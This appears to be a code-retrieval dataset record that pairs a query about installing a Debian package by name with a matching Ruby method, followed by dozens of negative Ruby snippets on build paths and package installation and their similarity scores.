"def _local_source(path)\n existent = ::Dir[\"#{ENV['DEV_HOME']}/*/{piktur/#{path},gems/#{path},#{path}}\"][0]\n Pathname(existent)\n end",
"def run_dir\n run_base + \"/g4.#{geant_version}_cms_#{cmssw_version}/#{build_type}/CMSSW_#{cmssw_version}/src\"\n end",
"def pkg_build\n sysprint \"#{@name} build\"\n\n if @bsdstyle == true\n FileUtils::cd(@srcdir)\n else\n FileUtils::cd(@objdir)\n end\n\n unless sysexec @build\n syserr \"Failed to compile package #{@name}\"\n raise\n end\n\n FileUtils::cd(BSYS_ROOTDIR)\n end",
"def package_dir_path\n \"#{package_dir}/#{package_name}\"\n end",
"def src_path\n File.dirname(__FILE__)\nend",
"def src_path\n File.dirname(__FILE__)\nend",
"def lib_out\n @mpc_project.recipe.get_relative_path(@mpc_project.lib_out)\n end",
"def build_project(go)\n content = {\n \"active\" => true,\n \"path\" => BASEDIR + \"/#{go}\"\n }\n return content\n end",
"def build_archive_dir\n out = config_source['build-archive-dir']\n out = nil if (out != nil && out.downcase == 'none')\n out = FilePath.new(out) unless out.nil?\n out\n end",
"def min_file_path\n compiled_path || current_file_path\n end",
"def pathSourcePackageJson\n\t\"./package-template.json\"\nend",
"def path\n Rails.root.join(ROOT, type, name, executable).to_s\n end",
"def build_info_file\n File.join build_info_dir, \"#{full_name}.info\"\n end",
"def build(env, request, path)\n stdout, stderr, status = Open3.capture3(CLI, Rails.root.to_s, path)\n\n if status.success?\n raise \"[froxy] build failed: #{stderr}\" unless stderr.empty?\n else\n non_empty_streams = [stdout, stderr].delete_if(&:empty?)\n raise \"[froxy] build failed:\\n#{non_empty_streams.join(\"\\n\\n\")}\"\n end\n\n path_to_file env, request, path\n end",
"def build_info_dir\n File.join base_dir, \"build_info\"\n end",
"def build\n output_filepath = \"#{self.build_path}/#{OUTPUT_FILENAME}\"\n\n Dir.chdir \"#{self.build_path}\"\n\n # Need 1.9.4 version in order have file encoding\n cmd = \"#{ENV['ant']} #{@config[:build_name]}\"\n #cmd = \"/usr/local/bin/ant #{@config[:build_name]}\"\n\n log \"Running '#{cmd}' in #{self.build_path}\"\n output = system(cmd)\n\n return output_filepath\n end",
"def package_dir\n config.package_dir\n end",
"def build_path\n end",
"def relative_path\n File.join(@repo, @bundle)\n end",
"def project_file(fname)\n \"#{@project_path}/#{fname}\"\nend",
"def assets_manifest_path\n build_output_dir.join('manifest-assets.json')\n end",
"def android_build_root()\n \"#{build_root}/android\"\n end",
"def build_dist_path(item)\n sub_build_dir = File.join(@config.build_dir, item.name)\n return Dir[File.join(sub_build_dir, \"#{item.name}-[0-9.]*.tar.gz\")][0]\n end",
"def compile\n Milkrun.say \"Cleaning and assembling a new #{task} build\"\n `./gradlew clean assemble#{task}`\n @assembled = true\n Milkrun.say \"Package built to #{path}\"\n path\n end",
"def build_gem; end",
"def iphone_build_root()\n \"#{build_root}/iphone\"\n end",
"def package_path(extension='.gem')\n File.join(package_dir, package_basename(extension))\n end",
"def gem_build_complete_path # :nodoc:\n File.join extension_dir, 'gem.build_complete'\n end",
"def source_dir\n Dir.pwd\nend",
"def makePath\n\t\t\tbuildMgr.effective(filename).dirname.mkpath\n\t\tend",
"def path_from_package(package_name)\n ret = package_from_name package_name\n ret && ret.root_path\n end",
"def bundle_dir\n File.expand_path(File.join(Bixby.repo_path, self.relative_path))\n end",
"def carthage_build_path(platform, framework)\n return \"#{carthage_build_dir_for_platform(platform)}/#{framework}\"\nend",
"def package_plugin(name)\n `cd #{@repository_path}; rake feather:package path=#{name} target=#{@build_path}`\n end",
"def get_build_fname(source_fname, suffix, builder_class)\n if extra_path = builder_class.extra_path\n extra_path = \"/#{extra_path}\"\n end\n \"#{@build_root}#{extra_path}/#{Util.make_relative_path(\"#{source_fname}#{suffix}\")}\".gsub(\"\\\\\", \"/\")\n end",
"def gemfile spec, source, destination = nil\n destination ||= File.expand_path \".\"\n\n require \"rubygems/builder\"\n\n Dir.chdir source do\n FileUtils.mv Gem::Builder.new(spec).build, destination\n end\n\n destination\n end",
"def make_installer_gtifw exe_path\n end",
"def get_build_dir\n if @build_dir\n File.join(@dirname, @build_dir)\n else\n @dirname\n end\n end",
"def get_build_dir\n if @build_dir\n File.join(@dirname, @build_dir)\n else\n @dirname\n end\n end",
"def dotfile( name )\n File.join( build_dir, \".#{name}\" )\n end",
"def make_carthage_build_path(name, platform)\n return \"Carthage/Build/#{platform}/#{name}\"\nend",
"def package_scripts_path(arg = NULL)\n if null?(arg)\n @package_scripts_path || \"#{Config.project_root}/package-scripts/#{name}\"\n else\n @package_scripts_path = File.expand_path(arg)\n end\n end",
"def package_scripts_path(arg = NULL)\n if null?(arg)\n @package_scripts_path || \"#{Config.project_root}/package-scripts/#{name}\"\n else\n @package_scripts_path = File.expand_path(arg)\n end\n end",
"def source_path; end",
"def component_src_path(cmp)\n File.join WORK_PATH, 'src', cmp\nend",
"def component_src_path(cmp)\n File.join WORK_PATH, 'src', cmp\nend",
"def ipa_path\n File.join(BuildCommandGenerator.build_path, \"#{Gym.config[:output_name]}.ipa\")\n end",
"def license_package_location(component_name, where)\n if local?(where)\n File.join(output_dir, \"#{component_name}-#{File.split(where).last}\")\n else\n u = URI(where)\n File.join(output_dir, \"#{component_name}-#{File.basename(u.path)}\")\n end\n end"
] | [
"0.7177168",
"0.71356404",
"0.7130146",
"0.7112139",
"0.70762694",
"0.704427",
"0.70293415",
"0.6967646",
"0.6964182",
"0.6778268",
"0.6737313",
"0.6720476",
"0.6702654",
"0.66772133",
"0.6621196",
"0.6613639",
"0.6557876",
"0.65513676",
"0.65442437",
"0.65442437",
"0.6502655",
"0.6500191",
"0.6470467",
"0.6463668",
"0.64504015",
"0.6422524",
"0.64171046",
"0.64140916",
"0.6406237",
"0.640375",
"0.6366067",
"0.63429",
"0.63347465",
"0.6327715",
"0.63123703",
"0.6301781",
"0.6284352",
"0.62832874",
"0.6269984",
"0.6266252",
"0.6257643",
"0.6249938",
"0.62314844",
"0.6210456",
"0.62080854",
"0.62080854",
"0.6206701",
"0.6193654",
"0.61897117",
"0.618819",
"0.618819",
"0.61719686",
"0.61656255",
"0.61558056",
"0.6132772",
"0.6129459",
"0.6110103",
"0.6110103",
"0.60891265",
"0.6080063",
"0.6079863",
"0.6079221",
"0.60542816",
"0.60091364",
"0.59806156",
"0.5977091",
"0.5976874",
"0.59710383",
"0.59654826",
"0.59644043",
"0.5952094",
"0.594987",
"0.59347665",
"0.5926026",
"0.5907039",
"0.59063154",
"0.5906128",
"0.59013927",
"0.5900599",
"0.58918434",
"0.58901364",
"0.5887383",
"0.5874184",
"0.5873885",
"0.5845994",
"0.5843203",
"0.5833066",
"0.5828184",
"0.58276176",
"0.5823161",
"0.5823161",
"0.5818356",
"0.5813278",
"0.58072567",
"0.58072567",
"0.58035856",
"0.5793035",
"0.5793035",
"0.5782682",
"0.577105"
] | 0.58402926 | 86 |
Install package name, where pkg is the debian package name | def install(pkg_name)
begin
pkg_build_dir = packaging_dir(pkg_name)
filepath = Dir.glob("#{pkg_build_dir}/*.deb")
if filepath.size < 1
raise RuntimeError, "No debian file found for #{pkg_name} in #{pkg_build_dir}: #{filepath}"
elsif filepath.size > 1
raise RuntimeError, "More than one debian file available in #{pkg_build_dir}: #{filepath}"
else
filepath = filepath.first
Packager.info "Found package: #{filepath}"
end
install_debfile(filepath)
rescue Exception => e
raise RuntimeError, "Installation of package '#{pkg_name} failed -- #{e}"
end
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def install_package host, package_name\n host.install_package package_name\n end",
"def install(pkg)\n package pkg do\n action :install\n end\nend",
"def install(packagename, force=false)\n\t\t\t\traise(InstallError, \"Automated package installation is not implemented on OpenBSD\")\n\t\t\tend",
"def install\n bin.install \"#{PACKAGE_NAME}\"\n end",
"def apt_install(pkg, check=false)\n if check && pkg_installed?(pkg)\n info %{Package \"#{pkg}\" is already installed, skipping.}\n else\n run %{apt-get install -y #{pkg}}\n end\nend",
"def install_package(name, version)\n package_provider.install_package\n end",
"def install_package host, package_name, package_version = nil\n host.install_package package_name, '', package_version\n end",
"def package_if_necessary(pkg)\n if !package_is_installed?(pkg)\n banner \"#{pkg}...\"\n run \"apt-get -y install #{pkg}\"\n end\n end",
"def install_pkgs! pkgs, opts\n log_shell \"Installing packages\", \"#{pkg_cmd} --sync --noconfirm --noedit --noprogressbar #{pkgs.join(' ')}\", :sudo => false\n end",
"def install(packagename, force=false)\n\t\t\t\tpackagename.strip!()\n\n\t\t\t\t# FIXME - check to see if it is already installed\n\n\t\t\t\tCfruby.controller.attempt(\"Installing \\\"#{packagename}\\\"\", 'destructive', 'unknown', 'install') {\n\t\t\t\t\t`#{@rpmbin} -i '#{packagename.gsub(/(\\')/, \"\\\\\\1\")}'`\n\t\t\t\t}\n\t\t\tend",
"def install_fake_pkg(name)\n require_relative 'ci-tooling/lib/dpkg'\n Dir.mktmpdir do |tmpdir|\n Dir.chdir(tmpdir) do\n FileUtils.mkpath(\"#{name}/DEBIAN\")\n File.write(\"#{name}/DEBIAN/control\", <<-EOF.gsub(/^\\s+/, ''))\n Package: #{name}\n Version: 999:999\n Architecture: all\n Maintainer: Harald Sitter <sitter@kde.org>\n Description: fake override package for kubuntu ci install checks\n EOF\n system(\"dpkg-deb -b #{name} #{name}.deb\")\n DPKG.dpkg(['-i', \"#{name}.deb\"])\n end\n end\nend",
"def install_packages(app)\n\n `installer -pkg \"#{app}\" -target /`\n\nend",
"def pkg_cmd; \"#{pkg_binary}\" end",
"def set_dpkg_package_name(name)\n dpkg_package.name name\n dpkg_package.package_name name\n end",
"def install\n pacman \"--noconfirm\", \"--noprogressbar\", \"-Sy\", @resource[:name]\n\n unless self.query\n raise Puppet::ExecutionFailure.new(\"Could not find package %s\" % self.name)\n end\n end",
"def install(packagename, force=false)\n\t\t\t\tpackagename.strip!()\n\n\t\t\t\t# FIXME - check to see if it is already installed\n\n\t\t\t\tCfruby.controller.attempt(\"Installing \\\"#{packagename}\\\"\", 'destructive', 'unknown', 'install') {\n\t\t\t\t\t`#{@finkbin} install '#{packagename.gsub(/(\\')/, \"\\\\\\1\")}'`\n\t\t\t\t}\n\t\t\tend",
"def install!(name:, dir: nil)\r\n end",
"def native_pkg_to_install_string(pkg)\n name = pkg[:metadata][:name]\n version = pkg[:metadata][:version]\n package_version = pkg[:metadata][:package_version]\n pkgname = \"#{name}-#{version}\"\n if package_version\n pkgname << \"-#{package_version}\"\n end\n pkgname\n end",
"def install_sol11_pkg(options,pkg_name)\n pkg_test = %x[which #{pkg_name}]\n if pkg_test.match(/no #{pkg_name}/)\n message = \"Information:\\tChecking Package \"+pkg_name+\" is installed\"\n command = \"pkg info #{pkg_name} 2>&1| grep \\\"Name:\\\" |awk \\\"{print \\\\\\$3}\\\"\"\n output = execute_command(options,message,command)\n if not output.match(/#{pkg_name}/)\n message = \"Information:\\tChecking publisher is online\"\n command = \"pkg publisher | grep online\"\n output = execute_command(options,message,command)\n if output.match(/online/)\n message = \"Information:\\tInstalling Package \"+pkg_name\n command = \"pkg install #{pkg_name}\"\n execute_command(options,message,command)\n end\n end\n end\n return\nend",
"def install\n cd_and_sh( pkg_dir, install_commands )\n end",
"def install!\n src = package_source\n chk = package_checksum\n windows_package 'Chef Development Kit' do\n source src\n checksum chk\n end\n end",
"def install\n self.run_preseed if @resource[:responsefile]\n should = @resource[:ensure]\n\n checkforcdrom\n cmd = %w{-q -y}\n\n keep = \"\"\n if config = @resource[:configfiles]\n if config == :keep\n cmd << \"-o\" << 'DPkg::Options::=--force-confold'\n else\n cmd << \"-o\" << 'DPkg::Options::=--force-confnew'\n end\n end\n\n str = @resource[:name]\n case should\n when true, false, Symbol\n # pass\n else\n # Add the package version and --force-yes option\n str += \"=#{should}\"\n cmd << \"--force-yes\"\n end\n\n cmd << :install << str\n\n aptget(*cmd)\n end",
"def install(name:, dir: nil)\r\n end",
"def install_package(target_package_path); raise NotImplementedError; end",
"def install_dep(name, version, install_dir = nil)\n install_dir ||= '/etc/puppet/modules'\n \"mkdir -p #{install_dir} && (puppet module list | grep #{name}) || puppet module install -v #{version} #{name}\"\nend",
"def install_in_ubuntu\n install_ppa(node['SignalFx_ppa']['collectd']['name'],\n node['SignalFx_ppa']['collectd']['uri'])\n install_ppa(node['SignalFx_ppa']['collectd_plugin']['name'],\n node['SignalFx_ppa']['collectd_plugin']['uri'])\n ubuntu_update\n install_package 'collectd'\nend",
"def pkg_default_install\n bsdstyle = @bsdstyle\n make = @make\n sudo_cmd = ''\n\n if bsdstyle == true\n sudo_cmd = 'sudo'\n end\n if make.length == 0\n make = $bsyscfg.get_make\n end\n\n <<INSTALL\n#{sudo_cmd} #{make} DESTDIR=#{$project_rootdir}/ install\nINSTALL\n end",
"def install(package)\n wait_until(\"Installing package\") do\n get \"/invoke/wm.server.packages/packageInstall?activateOnInstall=true&file=#{CGI.escape package.to_s}\"\n end\n end",
"def install_in_debian\n package 'apt-transport-https'\n package 'dirmngr' if get_debian_os_name == 'stretch'\n collectd_ppa_source = node['SignalFx_debian_ppa'][get_debian_os_name]['collectd']['uri']\n signalfx_collectd_plugin_ppa_source = node['SignalFx_debian_ppa'][get_debian_os_name]['collectd_plugin']['uri']\n signalfx_keyid = node['SignalFx_debian_ppa']['keyid']\n execute 'add SignalFx PPA' do\n command \"apt-key adv --keyserver keyserver.ubuntu.com --recv-keys #{signalfx_keyid} && \n echo #{collectd_ppa_source} > /etc/apt/sources.list.d/signalfx_collectd.list && \n echo #{signalfx_collectd_plugin_ppa_source} > /etc/apt/sources.list.d/signalfx_collectd_plugin.list\"\n action :run\n end\n ubuntu_update\n install_package 'collectd'\nend",
"def install_custom!\n do_dmg_package_resource!\n end",
"def linux_installer(package)\n\t\t\t\tsystem(\"sudo apt-get -y install #{package}\")\n\t\t\tend",
"def pkg_install\n return if @install.count == 0\n\n sysprint \"#{@name} install\"\n\n if @install[:bsys_install] != nil\n if @bsdstyle == true\n FileUtils::cd(@srcdir)\n else\n FileUtils::cd(@objdir)\n end\n\n unless sysexec(@install[:bsys_install])\n syserr \"Failed to install package\"\n raise\n end\n\n FileUtils::cd(BSYS_ROOTDIR)\n\n @install.delete(:bsys_install)\n end\n\n @install.each_pair do |src, dst|\n dst = File::join($project_rootdir, dst)\n if File::directory? src\n FileUtils::mkdir_p dst\n continue\n end\n\n # Create directory if it doesn't exists\n FileUtils::mkdir_p dst[0..-(File::basename(dst).length + 1)]\n\n if File::executable? src\n FileUtils::install(src, dst, :mode => 0755)\n else\n FileUtils::install(src, dst, :mode => 0644)\n end\n end\n end",
"def install!\n include_recipe 'apt'\n enable_i386_arch!\n add_repository!\n package('skype') { action :install }\n end",
"def debian_name(pkg)\n if pkg.kind_of?(Autoproj::RubyPackage)\n debian_ruby_name(pkg.name)\n else\n \"rock-\" + canonize(pkg.name)\n end\n end",
"def install\n should = @resource.should(:ensure)\n self.debug \"Ensuring => #{should}\"\n wanted = @resource[:name]\n\n # XXX: We don't actually deal with epochs here.\n case should\n when true, false, Symbol\n # pass\n else\n # Add the package version\n wanted += \"-#{should}\"\n end\n output = rug \"--quiet\", :install, \"-y\", wanted\n\n unless self.query\n raise Puppet::ExecutionFailure.new(\n \"Could not find package #{self.name}\"\n )\n end\n end",
"def install(package)\n\n return @results[:install] = 'no route to internet' unless internet?\n return @results[:install] = 'already installed' if installed? package\n \n instructions = \"apt-get update && apt-get install #{package} -y\"\n r = @ssh ? @ssh.exec!(instructions) : `#{instructions}`\n puts 'r: ' + r.inspect if @debug\n @results[:install] = r.chomp\n\n end",
"def register_debian_package(debian_pkg_file, release_name, codename, force = false)\n begin\n reprepro_dir = File.join(deb_repository, release_name)\n\n debian_package_dir = File.dirname(debian_pkg_file)\n debfile = File.basename(debian_pkg_file)\n debian_pkg_name = debfile.split(\"_\").first\n logfile = File.join(log_dir,\"#{debian_pkg_name}-reprepro.log\")\n\n if force\n deregister_debian_package(debian_pkg_name, release_name, codename, true)\n end\n @reprepro_lock.lock\n Dir.chdir(debian_package_dir) do\n if !File.exists?(debfile)\n raise ArgumentError, \"Apaka::Packaging::register_debian_package: could not find '#{debfile}' in directory: '#{debian_package_dir}'\"\n end\n\n cmd = [reprepro_bin]\n cmd << \"-V\" << \"-b\" << reprepro_dir <<\n \"includedeb\" << codename << debfile\n\n Packager.info \"Register deb file: #{cmd.join(\" \")} &>> #{logfile}\"\n if !system(*cmd, [:out, :err] => [logfile, \"a\"], :close_others => true)\n raise RuntimeError, \"Execution of #{cmd.join(\" \")} failed -- see #{logfile}\"\n end\n\n if not reprepro_has_dsc?(debian_pkg_name, release_name, codename, true)\n dscfile = Dir.glob(\"*.dsc\").first\n cmd = [reprepro_bin]\n cmd << \"-V\" << \"-b\" << reprepro_dir <<\n \"includedsc\" << codename << dscfile\n Packager.info \"Register dsc file: #{cmd.join(\" \")} &>> #{logfile}\"\n if !system(*cmd, [:out, :err] => [logfile, \"a\"], :close_others => true)\n raise RuntimeError, \"Execution of #{cmd.join(\" \")} failed -- see #{logfile}\"\n end\n end\n end\n ensure\n @reprepro_lock.unlock\n end\n end",
"def install(nofail = false)\n name = @resource[:name]\n should = @resource[:ensure]\n is = self.query\n if is[:ensure].to_sym == :absent\n command = 'install'\n else\n command = 'update'\n end\n args = ['--accept']\n if Puppet::Util::Package.versioncmp(Puppet.runtime[:facter].value(:operatingsystemrelease), '11.2') >= 0\n args.push('--sync-actuators-timeout', '900')\n end\n args.concat(join_options(@resource[:install_options])) if @resource[:install_options]\n unless should.is_a? Symbol\n name += \"@#{should}\"\n end\n self.unhold if self.properties[:mark] == :hold\n begin\n r = exec_cmd(command(:pkg), command, *args, name)\n ensure\n self.hold if @resource[:mark] == :hold\n end\n return r if nofail\n raise Puppet::Error, _(\"Unable to update %{package}\") % { package: r[:out] } if r[:exit] != 0\n end",
"def autoinstall(*packages)\n all_packages_installed = packages.all? { |pkg| Path.which pkg }\n\n unless all_packages_installed\n cmd([\"sudo apt-get install ?\", packages.join(' ')])\n end\nend",
"def dist_install( *pkgs )\n raise \"Include a distro-specific component, e.g. Debian, RHEL\"\n end",
"def manual_package_install(pkg_dependencies=[])\n\n unless pkg_dependencies.nil?\n pkg_dependencies.each do |pkg|\n\n if pkg =~ /\\.rpm/\n filename = $1 if pkg =~ /\\/(\\w+[a-zA-Z0-9\\-\\_\\.]+\\.rpm)\\z/\n p \"FILENAME: #{filename}\"\n remote_file \"#{Chef::Config[:file_cache_path]}/#{filename}\" do\n source \"#{pkg}\"\n action :create_if_missing\n end\n end\n\n package pkg do\n action :install\n if pkg =~ /\\.rpm/\n source \"#{Chef::Config[:file_cache_path]}/#{filename}\"\n provider Chef::Provider::Package::Rpm\n end\n end\n\n end\n end\n\nend",
"def install\n bin.install \"cmd/brew-pkg.rb\"\n end",
"def package(pkginfo, options = Hash.new)\n options, unknown_options = Kernel.filter_options options,\n :force_update => false,\n :patch_dir => nil,\n :distribution => nil, # allow to override global settings\n :architecture => nil\n\n options[:distribution] ||= target_platform.distribution_release_name\n options[:architecture] ||= target_platform.architecture\n\n debian_pkg_name = debian_name(pkginfo)\n\n if options[:force_update]\n dirname = packaging_dir(pkginfo)\n if File.directory?(dirname)\n Packager.info \"Debian: rebuild requested -- removing #{dirname}\"\n FileUtils.rm_rf(dirname)\n end\n end\n\n options[:packaging_dir] = packaging_dir(pkginfo)\n options[:release_name] = rock_release_name\n\n begin\n # Set the current pkginfo to set the install directory\n # correctly\n # FIXME: needs to be refactored\n #\n @packager_lock.lock\n @current_pkg_info = pkginfo\n\n pkginfo = prepare_source_dir(pkginfo, options.merge(unknown_options))\n\n if pkginfo.build_type == :orogen || pkginfo.build_type == :cmake || pkginfo.build_type == :autotools\n package_default(pkginfo, options)\n elsif pkginfo.build_type == :ruby\n # Import bundles since they do not need to be build and\n # they do not follow the typical structure required for gem2deb\n if pkginfo.name =~ /bundles/\n package_importer(pkginfo, options)\n else\n package_ruby(pkginfo, options)\n end\n elsif pkginfo.build_type == :archive_importer || pkginfo.build_type == :importer_package\n package_importer(pkginfo, options)\n else\n raise ArgumentError, \"Debian: Unsupported package type #{pkginfo.build_type} for #{pkginfo.name}\"\n end\n ensure\n @current_pkg_info = nil\n @packager_lock.unlock\n end\n end",
"def easy_install(package_path)\n upload_package(package_path)\n install_package\n end",
"def apt_install(packages)\n packages = packages.split(/\\s+/) if packages.respond_to?(:split)\n packages = Array(packages)\n apt_get=\"DEBCONF_TERSE='yes' DEBIAN_PRIORITY='critical' DEBIAN_FRONTEND=noninteractive apt-get\"\n sudo \"#{apt_get} -qyu --force-yes install #{packages.join(\" \")}\"\n end",
"def package_ruby(pkg, options) \n # update dependencies in any case, i.e. independant if package exists or not\n deps = dependencies(pkg)\n Dir.chdir(pkg.srcdir) do\n begin\n logname = \"obs-#{pkg.name.sub(\"/\",\"-\")}\" + \"-\" + Time.now.strftime(\"%Y%m%d-%H%M%S\").to_s + \".log\"\n gem = FileList[\"pkg/*.gem\"].first\n if not gem \n Packager.info \"Debian: creating gem from package #{pkg.name}\"\n if !system(\"rake gem 2> #{File.join(OBS_LOG_DIR, logname)}\")\n raise \"Debian: failed to create gem from RubyPackage #{pkg.name}\"\n Packager.warn \" check: #{File.expand_path(logname)}\"\n end\n end\n\n gem = FileList[\"pkg/*.gem\"].first\n\n # Make the naming of the gem consistent with the naming schema of\n # rock packages\n #\n # Make sure the gem has the fullname, e.g.\n # tools-metaruby instead of just metaruby\n gem_rename = gem.sub(basename(pkg.name), canonize(pkg.name))\n if gem != gem_rename\n Packager.info \"Debian: renaming #{gem} to #{gem_rename}\"\n FileUtils.mv gem, gem_rename\n gem = gem_rename\n end\n\n Packager.debug \"Debian: copy #{gem} to #{packaging_dir(pkg)}\"\n FileUtils.cp gem, packaging_dir(pkg)\n gem_final_path = File.join(packaging_dir(pkg), File.basename(gem))\n\n # Prepare injection of dependencies\n options[:deps] = deps\n convert_gem(gem_final_path, options)\n # register gem with the correct naming schema\n # to make sure dependency naming and gem naming are consistent\n @ruby_rock_gems << debian_name(pkg)\n rescue Exception => e\n raise \"Debian: failed to create gem from RubyPackage #{pkg.name} -- #{e.message}\\n#{e.backtrace.join(\"\\n\")}\"\n end\n end\n end",
"def install!\n cmd = [attributes.gem_binary, 'install']\n cmd << '-v' << attributes.version if attributes.version\n cmd << '--source' << attributes.source if attributes.source\n cmd << '--prerelease' if attributes.prerelease\n cmd << attributes.package_name\n\n run_command(cmd)\n end",
"def package(name, version=nil, options={:q => true, :y => true})\n name = \"#{name}=#{version}\" unless version.to_s.strip.empty?\n execute \"apt-get install\", name, options\n chain_proxy\n end",
"def package(pkg, options = Hash.new)\n\n options, unknown_options = Kernel.filter_options options,\n :force_update => false,\n :existing_source_dir => nil,\n :patch_dir => nil\n\n if options[:force_update]\n dirname = File.join(OBS_BUILD_DIR, debian_name(pkg))\n if File.directory?(dirname)\n Packager.info \"Debian: rebuild requested -- removing #{dirname}\"\n FileUtils.rm_rf(dirname)\n end\n end\n\n prepare_source_dir(pkg, options)\n\n if pkg.kind_of?(Autobuild::CMake) || pkg.kind_of?(Autobuild::Autotools)\n package_deb(pkg, options)\n elsif pkg.kind_of?(Autoproj::RubyPackage)\n package_ruby(pkg, options)\n else\n raise ArgumentError, \"Debian: Unsupported package type #{pkg.class} for #{pkg.name}\"\n end\n end",
"def apt_get_update_install\n @app.packages.present? ? install_additional_packages : update_apt\n end",
"def install_brew_pkg(options,pkg_name)\n pkg_status = check_brew_pkg(options,pkg_name)\n if pkg_status.match(/Not installed/)\n message = \"Information:\\tInstalling Package \"+pkg_name\n command = \"brew install #{pkg_name}\"\n execute_command(options,message,command)\n end\n return\nend",
"def install_package(names, versions)\n names.each_with_index do |name, index|\n cmd = powershell_exec(build_powershell_package_command(\"Install-Package '#{name}'\", versions[index]), timeout: new_resource.timeout)\n next if cmd.nil?\n raise Chef::Exceptions::PowershellCmdletException, \"Failed to install package due to catalog signing error, use skip_publisher_check to force install\" if /SkipPublisherCheck/.match?(cmd.error!)\n end\n end",
"def install_gem; end",
"def apt_install(packages)\n packages = packages.split(/\\s+/) if packages.respond_to?(:split)\n packages = Array(packages)\n sudo_with_input(\"#{apt_get_preamble} install #{packages.join(\" \")}\", /\\?/, \"\\n\")\n end",
"def packages debs, role\n run \"#{sudo} apt-get -y update && #{sudo} apt-get -y upgrade && #{sudo} apt-get install -y #{debs}\", :role => role\nend",
"def install\n Puppet.notice \"Installing #{@resource[:name]}\"\n should = @resource[:ensure]\n package_name = @resource[:name]\n case should\n when true, false, Symbol\n # pass\n else\n package_name += \"-#{should}\"\n end\n Puppet.debug \" Package: #{package_name}\"\n\n if install_options.any?\n output = execute([command(:brew), :install, package_name, *install_options])\n else\n output = execute([command(:brew), :install, package_name])\n end\n\n # Fail hard if there is no formula available.\n if output =~ /Error: No available formula/\n raise Puppet::ExecutionFailure, \"Could not find package #{@resource[:name]}\"\n end\n\n #if linkapps?\n # output = execute([command(:brew), :linkapps])\n #end\n end",
"def install\n bin.install \"sack\", \"sag\", \"sgrep\", \"F\"\n end",
"def action_install(type)\n from = Automation::Converter.to_unix_path(prompt('Install from : '))\n package_rb = File.join(from, 'package.rb')\n require package_rb\n\n raise Automation::ConsoleError.new(\"No definition found for package '#{package_rb}'\") unless PACKAGE_CLASS.has_key?(package_rb)\n plugin = PACKAGE_CLASS[package_rb].new\n plugin.install(from)\n puts \"Installed '#{type}' - #{plugin.name}\"\n end",
"def dist_install_s( *args )\n if args.last.is_a?( Hash )\n args = args.dup\n opts = args.pop\n else\n opts = {}\n end\n\n args = dist_map_packages( args )\n\n if opts[ :succeed ]\n \"yum install -q -y #{args.join ' '} || true\"\n else\n \"yum install -q -y #{args.join ' '}\"\n end\n end",
"def install\n end",
"def install_additional_packages\n <<~APT\n # Install app-specific Ubuntu packages\n RUN DEBIAN_FRONTEND=noninteractive apt-get update && apt-get install -y #{NL_TAB}#{@app.packages.join(\" #{NL_TAB}\")}\n APT\n end",
"def install\n yaourt('--noconfirm', '-Sy', @resource[:name])\n end",
"def package(pkg)\n @pkg = pkg\n end",
"def install\n should = @resource[:ensure]\n\n package_name = @resource[:name]\n case should\n when true, false, Symbol\n # pass\n else\n package_name += \"-#{should}\"\n end\n\n output = brew(:install, package_name)\n\n # Fail hard if there is no formula available.\n if output =~ /Error: No available formula/\n raise Puppet::ExecutionFailure, \"Could not find package #{@resource[:name]}\"\n end\n end",
"def install\n ssh.exec! \"curl -O https://opscode-omnibus-packages.s3.amazonaws.com/ubuntu/12.04/x86_64/chefdk_0.0.1-1_amd64.deb\"\n ssh.exec! \"dpkg --install chefdk_0.0.1-1_amd64.deb\", sudo: true\n ssh.exec! \"rm chefdk_0.0.1-1_amd64.deb\", sudo: true\n end",
"def do_dmg_package_resource!\n dmg_package 'Chef Development Kit' do\n app dmg_package_app\n volumes_dir 'Chef Development Kit'\n source dmg_package_source\n type 'pkg'\n package_id 'com.getchef.pkg.chefdk'\n checksum dmg_package_checksum\n end\n end",
"def install_repo!\n package 'apt-transport-https'\n include_recipe \"apt-chef::#{new_resource.channel}\"\n package 'chefdk' do\n version new_resource.version unless new_resource.version == 'latest'\n end\n end",
"def install\n end",
"def install\n end",
"def install_custom!\n remote_file local_path do\n source new_resource.source.to_s\n checksum new_resource.checksum unless new_resource.checksum.nil?\n end\n dpkg_package local_path\n end",
"def action_install\n run_package_action(:install)\n end",
"def package *args\n\t\targs.each do | name |\n\t\t\treturn if haspackage? name\n\t\tend\n\t\t@cf.cfp_logger.notify VERBOSE_MAJOR,\"Skipping - package #{args.join(',')} not installed\"\n\t\traise PackageNotInstalledError.new('Package '+args.join(\",\")+' not installed')\n\tend",
"def install\n cmd = %w{--noconfirm --noedit --deps --builddir /tmp}\n cmd += install_options if @resource[:install_options]\n cmd << \"-S\" << @resource[:name]\n\n aurget(*cmd)\n\n unless self.query\n fail(\"Could not find package '#{@resource[:name]}'\")\n end\n end",
"def install_pkgmgr\n announcing 'Installing Package Manager' do\n chroot 'install_pkgmgr'\n end\n send_to_state('build', 'install_pkgmgr')\n end",
"def upgrade_direct!\n package \"Chef Development Kit v#{package_metadata[:version]}\" do\n source package_metadata[:url]\n checksum package_metadata[:sha256]\n end\n end",
"def apt_packages\n PRE_INSTALLED_OS_PACKAGES[@app.release].join(\" #{NL_TAB}\")\n end",
"def install\n args = %w{install -q}\n if @resource[:source]\n args << \"-e\"\n if String === @resource[:ensure]\n args << \"#{@resource[:source]}@#{@resource[:ensure]}#egg=#{\n @resource[:name]}\"\n else\n args << \"#{@resource[:source]}#egg=#{@resource[:name]}\"\n end\n else\n case @resource[:ensure]\n when String\n args << \"#{@resource[:name]}==#{@resource[:ensure]}\"\n when :latest\n args << \"--upgrade\" << @resource[:name]\n else\n args << @resource[:name]\n end\n end\n lazy_pip *args\n end",
"def install\n args = %w{install -q}\n if @resource[:source]\n args << \"-e\"\n if String === @resource[:ensure]\n args << \"#{@resource[:source]}@#{@resource[:ensure]}#egg=#{\n @resource[:name]}\"\n else\n args << \"#{@resource[:source]}#egg=#{@resource[:name]}\"\n end\n else\n case @resource[:ensure]\n when String\n args << \"#{@resource[:name]}==#{@resource[:ensure]}\"\n when :latest\n args << \"--upgrade\" << @resource[:name]\n else\n args << @resource[:name]\n end\n end\n lazy_pip *args\n end",
